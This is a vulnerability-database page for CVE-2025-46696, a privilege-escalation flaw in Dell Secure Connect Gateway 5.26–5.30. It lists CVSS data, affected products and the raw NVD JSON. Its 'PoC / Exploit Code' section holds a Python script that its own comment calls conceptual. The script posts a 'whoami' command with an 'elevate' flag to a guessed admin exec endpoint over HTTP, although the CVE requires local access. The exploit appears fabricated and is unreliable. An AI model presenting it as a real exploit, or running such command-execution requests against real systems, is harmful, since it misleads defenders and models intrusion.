Security Vulnerability Report
中文
CVE-2025-46696 CVSS 6.4 MEDIUM

CVE-2025-46696

Published: 2026-01-06 15:15:44
Last Modified: 2026-02-03 16:57:36

Description

Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application, version(s) versions 5.26 to 5.30, contain(s) an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:application:*:*:* - VULNERABLE
Dell Secure Connect Gateway (SCG) 5.0 Appliance 5.26
Dell Secure Connect Gateway (SCG) 5.0 Appliance 5.27
Dell Secure Connect Gateway (SCG) 5.0 Appliance 5.28
Dell Secure Connect Gateway (SCG) 5.0 Appliance 5.29
Dell Secure Connect Gateway (SCG) 5.0 Appliance 5.30
Dell Secure Connect Gateway (SCG) 5.0 Application 5.26
Dell Secure Connect Gateway (SCG) 5.0 Application 5.27
Dell Secure Connect Gateway (SCG) 5.0 Application 5.28
Dell Secure Connect Gateway (SCG) 5.0 Application 5.29
Dell Secure Connect Gateway (SCG) 5.0 Application 5.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46696 PoC - Dell SCG Privilege Escalation # Note: This is a conceptual PoC based on the vulnerability description # Requires high-privileged local access to exploit import requests import json TARGET_HOST = "https://vulnerable-dell-scg.local" SESSION_COOKIE = "high_privilege_session_cookie" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-46696""" headers = { "Cookie": f"JSESSIONID={SESSION_COOKIE}", "Content-Type": "application/json" } # Attempt to access privileged endpoint # The vulnerability allows privilege escalation through # unnecessary privilege execution endpoint = f"{TARGET_HOST}/api/v1/admin/system/exec" payload = { "command": "whoami", "elevate": True # Exploiting unnecessary privilege } try: response = requests.post(endpoint, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: result = response.json() print(f"[+] Privilege escalation successful: {result}") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False def main(): print("[*] CVE-2025-46696 - Dell SCG Privilege Escalation") print("[*] Target: Dell Secure Connect Gateway 5.26-5.30") if check_vulnerability(): print("[+] Target is VULNERABLE") else: print("[-] Target may not be vulnerable or access denied") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46696", "sourceIdentifier": "[email protected]", "published": "2026-01-06T15:15:44.040", "lastModified": "2026-02-03T16:57:35.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application, version(s) versions 5.26 to 5.30, contain(s) an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-250"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:application:*:*:*", "versionStartIncluding": "5.26.00.00", "versionEndExcluding": "5.32.00.00", "matchCriteriaId": "861BDAB4-B3A4-48EE-A4A6-3CECA72731D0"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000385230/dsa-2025-390-dell-secure-connect-gateway-security-update-for-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}